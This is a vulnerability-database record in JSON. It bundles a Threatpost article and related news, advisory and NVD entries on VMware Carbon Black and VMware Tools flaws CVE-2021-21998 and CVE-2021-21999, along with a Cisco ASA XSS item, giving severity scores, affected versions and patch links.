DATABASE RESOURCES PRICING ABOUT US

{"id": "THREATPOST:9AD64DC6BE4117F56E76B2BF8F28A597", "vendorId": null, "type": "threatpost", "bulletinFamily": "info", "title": "Critical VMware Carbon Black Bug Allows Auth Bypass", "description": "VMware has fixed an uber-severe bug in its Carbon Black App Control (AppC) management server: A server whose job is to lock down critical systems and servers so they don\u2019t get changed willy-nilly.\n\nAppC also ensures that organizations stay in continuous compliance with regulatory mandates.\n\nThis is a bad one: VMware puts the flaw, [CVE-2021-21998](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21998>), in the critical severity range with a maximum CVSSv3 base score of 9.4 out of 10. The bug is an authentication bypass that could enable an attacker with network access to the server to get administrative privileges without needing to authenticate.\n\nAccording to VMware\u2019s [advisory](<https://www.vmware.com/security/advisories/VMSA-2021-0012.html>), the authentication-bypass bug affects AppC versions 8.0, 8.1, 8.5 before 8.5.8, and 8.6 before 8.6.2.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAs pointed out by [Heimdal Security](<https://heimdalsecurity.com/blog/vmware-fixes-severe-carbon-black-app-control-authentication-bypass-vulnerability/>), depending on the environment, threat actors could exploit the vulnerability \u201cto maximum advantage to attack anything from point-of-sale [systems] (PoS) to industrial-control systems.\u201d\n\nTo avoid that, organizations must patch, as there are no workarounds available.\n\nBelow are the patches, listed in the Fixed Version column of the VMware\u2019s Response Matrix:\n\nProduct | Version | Running On | CVE Identifier | CVSSv3 | Severity | Fixed Version | Version Workarounds | Additional Documentation \n---|---|---|---|---|---|---|---|--- \nAppC | 8.6.x | Windows | CVE-2021-21998 | 9.4 | critical | 8.6.2 | None | None \nAppC | 8.5.x | Windows | CVE-2021-21998 | 9.4 | critical | \n\n8.5.8\n\n| None | None \nAppC | 8.1.x, 8.0.x | Windows | CVE-2021-21998 | 9.4 | critical | Hotfix | None | None \n \nCredit for discovering and reporting CVE-2021-21999 goes to [Zeeshan Shaikh](<https://twitter.com/bugzzzhunter>) from NotSoSecure, who worked with Trend Micro Zero Day Initiative (ZDI) and [Hou JingYi](<https://twitter.com/hjy79425575>) of Qihoo 360.\n\n## Plus This: High-Risk Bug in Other VMware Products\n\nBesides the authentication-bypass fix, VMware also published a security advisory for a high-risk bug in VMware Tools, VMware Remote Console for Windows (VMRC), and VMware App Volumes products.\n\nAt this point, the bug doesn\u2019t have a severity score from the National Institute of Standards and Technology (NIST), but VMware evaluated it at 7.8 (high severity). The flaw, [CVE-2021-21999](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21999>), is a local privilege-escalation vulnerability.\n\nVMware\u2019s [advisory](<https://www.vmware.com/security/advisories/VMSA-2021-0013.html>) lists the affected products as VMware Tools for Windows (11.x.y prior to 11.2.6), VMware Remote Console for Windows (12.x prior to 12.0.1) , and VMware App Volumes (2.x prior to 2.18.10 and 4 prior to 2103).\n\nOnce again, there\u2019s no workaround for this one. Admins should patch it as soon as possible, given what VMware said can be done with it:\n\n> An attacker with normal access to a virtual machine may exploit this issue by placing a malicious file renamed as `openssl.cnf\u2019 in an unrestricted directory which would allow code to be executed with elevated privileges.\n\n## History of Critical Holes\n\nThe security hole in AppC is only the latest critical problem that VMware has addressed. In February, for one, VMware [patched three vulnerabilities](<https://threatpost.com/vmware-patches-critical-rce-flaw-in-vcenter-server/164240/>) in its virtual-machine infrastructure for data centers, including a remote code-execution (RCE) flaw in its vCenter Server management platform. The vulnerability could allow attackers to breach the external perimeter of an enterprise data center or leverage backdoors already installed on a system, to find other vulnerable points of network entry to take over affected systems.\n\nMore recently, in April, another [critical cloud bug](<https://threatpost.com/critical-cloud-bug-vmware-carbon-black/165278/>), again in VMWare Carbon Black, would have allowed takeover. The bug (CVE-2021-21982) ranked 9.1 out of 10 on the CVSS vulnerability-severity scale. It would enable privilege escalation and the ability to take over the administrative rights for the VMware Carbon Black Cloud Workload appliance.\n\n**Join Threatpost for \u201c**[**Tips and Tactics for Better Threat Hunting**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)**\u201d \u2014 a LIVE event on **[**Wed., June 30 at 2:00 PM ET**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)** in partnership with Palo Alto Networks. Learn from Palo Alto\u2019s Unit 42 experts the best way to hunt down threats and how to use automation to help. **[**Register HERE**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)** for free. **\n", "published": "2021-06-24T15:31:31", "modified": "2021-06-24T15:31:31", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cvss2": {}, "cvss3": {}, "href": "https://threatpost.com/vmware-carbon-black-authentication-bypass/167226/", "reporter": "Lisa Vaas", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21998", "https://www.vmware.com/security/advisories/VMSA-2021-0012.html", "https://threatpost.com/newsletter-sign/", "https://heimdalsecurity.com/blog/vmware-fixes-severe-carbon-black-app-control-authentication-bypass-vulnerability/", "https://twitter.com/bugzzzhunter", "https://twitter.com/hjy79425575", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21999", "https://www.vmware.com/security/advisories/VMSA-2021-0013.html", "https://threatpost.com/vmware-patches-critical-rce-flaw-in-vcenter-server/164240/", "https://threatpost.com/critical-cloud-bug-vmware-carbon-black/165278/", "https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar", "https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar", "https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar"], "cvelist": ["CVE-2020-3580", "CVE-2021-21982", "CVE-2021-21998", "CVE-2021-21999"], "immutableFields": [], "lastseen": "2021-06-25T16:18:48", "viewCount": 134, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:6D848E58-548B-45BE-A600-D0B5780BEB50"]}, {"type": "avleonov", "idList": ["AVLEONOV:14D436977A1AFE4725A5CA01B44E33E9"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-3375"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2020-3580"]}, {"type": "cisco", "idList": ["CISCO-SA-ASAFTD-XSS-MULTIPLE-FCB3VPZE"]}, {"type": "cve", "idList": ["CVE-2020-3580", "CVE-2021-21982", "CVE-2021-21998", "CVE-2021-21999"]}, {"type": "githubexploit", "idList": ["83C1EA82-471C-5783-8685-73DB774CDE06"]}, {"type": "hackerone", "idList": ["H1:1243650", "H1:1245048", "H1:1245055", "H1:1277383", "H1:1277389", "H1:1277392", "H1:1606068"]}, {"type": "hivepro", "idList": ["HIVEPRO:5F380D4AD293CC5E96CCE20B9056D207"]}, {"type": "nessus", "idList": ["CISCO-SA-ASA-XSS-MULTIPLE-FCB3VPZE.NASL", "CISCO-SA-ASAFTD-XSS-MULTIPLE-FCB3VPZE.NASL", "CISCO_ASA_CVE-2020-3580.NBIN", "VMWARE_CB_APP_CONTROL_VMSA-2021-0012.NASL", "VMWARE_TOOLS_WIN_VMSA_2021_0013.NASL"]}, {"type": "thn", "idList": ["THN:4640BEB83FE3611B6867B05878F52F0D", "THN:868A288940CAEB61BD09AB7B818AD160", "THN:E61FB01ED36F5A39FD247813F1A893BD"]}, {"type": "threatpost", "idList": ["THREATPOST:0499757784EF5DB6F115661A76B7C352", "THREATPOST:21DEB20ED3F651F477BD38ECDF58B94B", "THREATPOST:6C1025257B798335D913F95B63229B76", "THREATPOST:918D372641AFC01D7D36FE88D08ACA6E", "THREATPOST:98B57FBF6D83FA4D12BEE06C0281FF91", "THREATPOST:A2AB7D9E07DE88E79BA713CE497B0784", "THREATPOST:CB4A70D64DFB759DFD6E7A4029D48E10", "THREATPOST:E3FA0D5BB017B7DD39D5924D32A9A668"]}, {"type": "vmware", "idList": ["VMSA-2021-0005", "VMSA-2021-0012", "VMSA-2021-0013"]}, {"type": "zdi", "idList": ["ZDI-21-754"]}]}, "score": {"value": 0.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:6D848E58-548B-45BE-A600-D0B5780BEB50"]}, {"type": "avleonov", "idList": ["AVLEONOV:14D436977A1AFE4725A5CA01B44E33E9"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-3375"]}, {"type": "cisco", "idList": ["CISCO-SA-ASAFTD-XSS-MULTIPLE-FCB3VPZE"]}, {"type": "cve", "idList": ["CVE-2020-3580", "CVE-2021-21982", "CVE-2021-21998", "CVE-2021-21999"]}, {"type": "githubexploit", "idList": ["83C1EA82-471C-5783-8685-73DB774CDE06"]}, {"type": "hackerone", "idList": ["H1:1277389", "H1:1277392"]}, {"type": "hivepro", "idList": ["HIVEPRO:5F380D4AD293CC5E96CCE20B9056D207"]}, {"type": "nessus", "idList": ["CISCO-SA-ASA-XSS-MULTIPLE-FCB3VPZE.NASL", "CISCO-SA-ASAFTD-XSS-MULTIPLE-FCB3VPZE.NASL"]}, {"type": "thn", "idList": ["THN:4640BEB83FE3611B6867B05878F52F0D", "THN:868A288940CAEB61BD09AB7B818AD160", "THN:E61FB01ED36F5A39FD247813F1A893BD"]}, {"type": "threatpost", "idList": ["THREATPOST:0499757784EF5DB6F115661A76B7C352", "THREATPOST:050A36E6453D4472A2734DA342E95366", "THREATPOST:21DEB20ED3F651F477BD38ECDF58B94B", "THREATPOST:6C1025257B798335D913F95B63229B76", "THREATPOST:918D372641AFC01D7D36FE88D08ACA6E", "THREATPOST:98B57FBF6D83FA4D12BEE06C0281FF91", "THREATPOST:A2AB7D9E07DE88E79BA713CE497B0784", "THREATPOST:CB4A70D64DFB759DFD6E7A4029D48E10", "THREATPOST:E3FA0D5BB017B7DD39D5924D32A9A668"]}, {"type": "vmware", "idList": ["VMSA-2021-0012"]}, {"type": "zdi", "idList": ["ZDI-21-754"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2020-3580", "epss": "0.973460000", "percentile": "0.997800000", "modified": "2023-03-16"}, {"cve": "CVE-2021-21982", "epss": "0.001690000", "percentile": "0.521110000", "modified": "2023-03-17"}, {"cve": "CVE-2021-21998", "epss": "0.002220000", "percentile": "0.587600000", "modified": "2023-03-17"}, {"cve": "CVE-2021-21999", "epss": "0.000450000", "percentile": "0.125810000", "modified": "2023-03-17"}], "vulnersScore": 0.9}, "_state": {"dependencies": 1678920471, "score": 1678921101, "epss": 1679073339}, "_internal": {"score_hash": "ec72fe664fbd902085be64801b5b396c"}}

{"thn": [{"lastseen": "2022-05-09T12:37:55", "description": "[](<https://thehackernews.com/images/-j136_z7UZNc/YNQ7Y__WRWI/AAAAAAAAC-U/oIYaMgYSXVYLJkHR5taYmCdxvH79jX-ewCLcBGAsYHQ/s0/vmware.jpg>)\n\nVMware has rolled out security updates to resolve a critical flaw affecting Carbon Black App Control that could be exploited to bypass authentication and take control of vulnerable systems.\n\nThe vulnerability, identified as CVE-2021-21998, is rated 9.4 out of 10 in severity by the industry-standard Common Vulnerability Scoring System (CVSS) and affects App Control (AppC) versions 8.0.x, 8.1.x, 8.5.x, and 8.6.x.\n\n[Carbon Black App Control](<https://www.carbonblack.com/products/app-control/>) is a security solution designed to lock down critical systems and servers to prevent unauthorized changes in the face of cyber-attacks and ensure compliance with regulatory mandates such as PCI-DSS, HIPAA, GDPR, SOX, FISMA, and NERC.\n\n\"A malicious actor with network access to the VMware Carbon Black App Control management server might be able to obtain administrative access to the product without the need to authenticate,\" the California-based cloud computing and virtualization technology company [said](<https://www.vmware.com/security/advisories/VMSA-2021-0012.html>) in an advisory.\n\nCVE-2021-21998 is the second time VMware is addressing an authentication bypass issue in its Carbon Black endpoint security software. Earlier this April, the company fixed an incorrect URL handling vulnerability in the Carbon Black Cloud Workload appliance ([CVE-2021-21982](<https://thehackernews.com/2021/04/critical-auth-bypass-bug-found-in.html>)) that could be exploited to gain access to the administration API. \n\nThat's not all. VMware also patched a local privilege escalation bug affecting VMware Tools for Windows, VMware Remote Console for Windows (VMRC for Windows), and VMware App Volumes (CVE-2021-21999, CVSS score: 7.8) that could allow a bad actor to execute arbitrary code on affected systems.\n\n\"An attacker with normal access to a virtual machine may exploit this issue by placing a malicious file renamed as 'openssl.cnf' in an unrestricted directory which would allow code to be executed with elevated privileges,\" VMware [noted](<https://www.vmware.com/security/advisories/VMSA-2021-0013.html>).\n\nVMware credited Zeeshan Shaikh (@bugzzzhunter) from NotSoSecure and Hou JingYi (@hjy79425575) of Qihoo 360 for reporting the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-24T08:00:00", "type": "thn", "title": "Critical Auth Bypass Bug Affects VMware Carbon Black App Control", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21982", "CVE-2021-21998", "CVE-2021-21999"], "modified": "2021-06-24T08:00:41", "id": "THN:868A288940CAEB61BD09AB7B818AD160", "href": "https://thehackernews.com/2021/06/critical-auth-bypass-bug-affects-vmware.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:23", "description": "[](<https://thehackernews.com/images/-LL794hm32nE/YG1jF7U5ZaI/AAAAAAAACMU/Q1a-oTSPl_st9NtxIFPobNiHuZtjk9boQCLcBGAsYHQ/s0/vmware.jpg>)\n\nA critical vulnerability in the VMware Carbon Black Cloud Workload appliance could be exploited to bypass authentication and take control of vulnerable systems.\n\nTracked as CVE-2021-21982, the flaw is rated 9.1 out of a maximum of 10 in the CVSS scoring system and affects all versions of the product prior to 1.0.1. \n\nCarbon Black Cloud Workload is a data center security product from VMware that aims to protect critical servers and workloads hosted on vSphere, the company's cloud-computing virtualization platform.\n\n\"A URL on the administrative interface of the VMware Carbon Black Cloud Workload appliance can be manipulated to bypass authentication,\" VMware [said](<https://www.vmware.com/security/advisories/VMSA-2021-0005.html>) in its advisory, thereby allowing an adversary with network access to the interface to gain access to the administration API of the appliance.\n\nArmed with the access, a malicious actor can then view and alter [administrative configuration settings](<https://docs.vmware.com/en/VMware-Carbon-Black-Cloud-Workload/1.0/carbonblack_workload/GUID-E2ED3713-315B-4EEE-A3E8-A7A09A011101.html>), the company added.\n\nIn addition to releasing a fix for CVE-2021-21982, VMware has also [addressed](<https://www.vmware.com/security/advisories/VMSA-2021-0004.html>) two separate bugs in its vRealize Operations Manager solution that an attacker with network access to the API could exploit to carry out Server Side Request Forgery ([SSRF](<https://www.acunetix.com/blog/articles/server-side-request-forgery-vulnerability/>)) attacks to steal administrative credentials (CVE-2021-21975) and write files to arbitrary locations on the underlying [photon](<https://github.com/vmware/photon>) operating system (CVE-2021-21983).\n\nThe product is primarily designed to monitor and optimize the performance of the virtual infrastructure and support features such as workload balancing, troubleshooting, and compliance management.\n\nEgor Dimitrenko, a security researcher with Positive Technologies, has been credited with reporting all three flaws.\n\n\"The main risk is that administrator privileges allow attackers to exploit the second vulnerability\u2014CVE-2021-21983 (an arbitrary file write flaw, scored 7.2), which allows executing any commands on the server,\" Dimitrenko [said](<https://www.ptsecurity.com/ww-en/about/news/vmware-fixes-dangerous-vulnerabilities-in-software-for-infrastructure-monitoring-discovered-by-positive-technologies/>). \"The combination of two security flaws makes the situation even more dangerous, as it allows an unauthorized attacker to obtain control over the server and move laterally within the infrastructure.\"\n\nVMware has released patches for vRealize Operations Manager versions 7.0.0, 7.5.0, 8.0.1, 8.1.1, 8.2.0 and 8.3.0. The company has also published workarounds to mitigate the risks associated with the flaws in scenarios where the patch cannot be installed or is not available.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-04-07T08:03:00", "type": "thn", "title": "Critical Auth Bypass Bug Found in VMware Data Center Security Product", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21982", "CVE-2021-21983"], "modified": "2021-04-07T09:38:17", "id": "THN:4640BEB83FE3611B6867B05878F52F0D", "href": "https://thehackernews.com/2021/04/critical-auth-bypass-bug-found-in.html", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:54", "description": "[](<https://thehackernews.com/images/-tjjYBmcca9c/YNluSotRJvI/AAAAAAAADAo/Xa7v4Mhy6ckqFcAlDlyulMQJaAFb4NMvwCLcBGAsYHQ/s0/cisco.jpg>)\n\nA security vulnerability in Cisco Adaptive Security Appliance (ASA) that was addressed by the company last October, and again earlier this April, has been subjected to active in-the-wild attacks following the release of proof-of-concept (PoC) exploit code.\n\nThe PoC was [published](<https://twitter.com/ptswarm/status/1408050644460650502>) by researchers from cybersecurity firm Positive Technologies on June 24, following which reports emerged that attackers are chasing after an exploit for the bug.\n\n\"Tenable has also received a report that attackers are exploiting CVE-2020-3580 in the wild,\" the cyber exposure company [said](<https://www.tenable.com/blog/cve-2020-3580-proof-of-concept-published-for-cisco-asa-flaw-patched-in-october>).\n\n[](<https://thehackernews.com/images/-2-rqA8MJiRM/YNlrTddMsEI/AAAAAAAADAg/pGvuWEREWDEGI3u_A6lMsi6FBLq6Pr0XwCLcBGAsYHQ/s0/cisco-exploit.jpg>)\n\nTracked as [CVE-2020-3580](<https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-asaftd-xss-multiple-FCB3vPZe.html>) (CVSS score: 6.1), the issue concerns multiple vulnerabilities in the web services interface of Cisco ASA software and Cisco Firepower Threat Defense (FTD) software that could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks on an affected device.\n\nAs of July 2020, there were a little over [85,000 ASA/FTD devices](<https://www.rapid7.com/blog/post/2020/07/23/cve-2020-3452-cisco-asa-firepower-read-only-path-traversal-vulnerability-what-you-need-to-know/>), 398 of which are spread across 17% of the Fortune 500 companies, according to cybersecurity company Rapid7.\n\nSuccessful exploitation, such as scenarios where a user of the interface is convinced to click a specially-crafted link, could permit the adversary to execute arbitrary JavaScript code in the context of the interface or access sensitive, browser-based information.\n\nAlthough Cisco remediated the flaw in October 2020, the network equipment company subsequently determined the fix to be \"incomplete,\" thereby requiring a second round of patches that were released on April 28, 2021.\n\nIn light of public PoC availability, it's recommended that organizations prioritize patching CVE-2020-3580 to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-28T06:39:00", "type": "thn", "title": "Cisco ASA Flaw Under Active Attack After PoC Exploit Posted Online", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452", "CVE-2020-3580"], "modified": "2021-06-30T15:48:38", "id": "THN:E61FB01ED36F5A39FD247813F1A893BD", "href": "https://thehackernews.com/2021/06/cisco-asa-flaw-under-active-attack.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "hivepro": [{"lastseen": "2021-08-23T15:19:10", "description": "#### THREAT LEVEL: Amber.\n\nFor a detailed advisory, [download the ](<https://www.hivepro.com/wp-content/uploads/2021/06/TA202120.pdf>)[pdf](<https://www.hivepro.com/wp-content/uploads/2021/06/TA202121.pdf>)[ file here](<https://www.hivepro.com/wp-content/uploads/2021/06/TA202120.pdf>).\n\nVMware has patched an authentication bypass vulnerability(CVE-2021-21998) in the carbon black app control management server. Apart from this vulnerability VMware also patched a privilege escalation vulnerability(CVE-2021-21999) which was affected the VMware Tools for Windows, VMware Remote Console for Windows.\n\n#### Vulnerability Details\n\n\n\n#### Patch Links\n\n<https://www.vmware.com/security/advisories/VMSA-2021-0012.html>\n\n<https://www.vmware.com/security/advisories/VMSA-2021-0013.html>\n\n#### References\n\n<https://us-cert.cisa.gov/ncas/current-activity/2021/06/23/vmware-releases-security-updates>\n\n<https://www.bleepingcomputer.com/news/security/vmware-fixes-authentication-bypass-in-carbon-black-app-control/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-24T11:26:41", "type": "hivepro", "title": "VMware patches 2 Critical Vulnerabilities in Carbon Black App Control, VMWare Tools and VMWare Remote Console", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21998", "CVE-2021-21999"], "modified": "2021-06-24T11:26:41", "id": "HIVEPRO:5F380D4AD293CC5E96CCE20B9056D207", "href": "https://www.hivepro.com/vmware-patches-2-critical-vulnerabilities-in-carbon-black-app-control-vmware-tools-and-vmware-remote-console/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-02-09T14:07:44", "description": "VMware Carbon Black Cloud Workload appliance 1.0.0 and 1.01 has an authentication bypass vulnerability that may allow a malicious actor with network access to the administrative interface of the VMware Carbon Black Cloud Workload appliance to obtain a valid authentication token. Successful exploitation of this issue would result in the attacker being able to view and alter administrative configuration settings.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-04-01T19:15:00", "type": "cve", "title": "CVE-2021-21982", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21982"], "modified": "2021-04-06T16:29:00", "cpe": ["cpe:/a:vmware:carbon_black_cloud_workload:1.0.1"], "id": "CVE-2021-21982", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21982", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:vmware:carbon_black_cloud_workload:1.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:07:48", "description": "VMware Carbon Black App Control 8.0, 8.1, 8.5 prior to 8.5.8, and 8.6 prior to 8.6.2 has an authentication bypass. A malicious actor with network access to the VMware Carbon Black App Control management server might be able to obtain administrative access to the product without the need to authenticate.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-23T12:15:00", "type": "cve", "title": "CVE-2021-21998", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21998"], "modified": "2021-06-30T00:30:00", "cpe": ["cpe:/a:vmware:carbon_black_app_control:8.0", "cpe:/a:vmware:carbon_black_app_control:8.1"], "id": "CVE-2021-21998", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21998", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vmware:carbon_black_app_control:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:carbon_black_app_control:8.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:07:46", "description": "VMware Tools for Windows (11.x.y prior to 11.2.6), VMware Remote Console for Windows (12.x prior to 12.0.1) , VMware App Volumes (2.x prior to 2.18.10 and 4 prior to 2103) contain a local privilege escalation vulnerability. An attacker with normal access to a virtual machine may exploit this issue by placing a malicious file renamed as `openssl.cnf' in an unrestricted directory which would allow code to be executed with elevated privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": 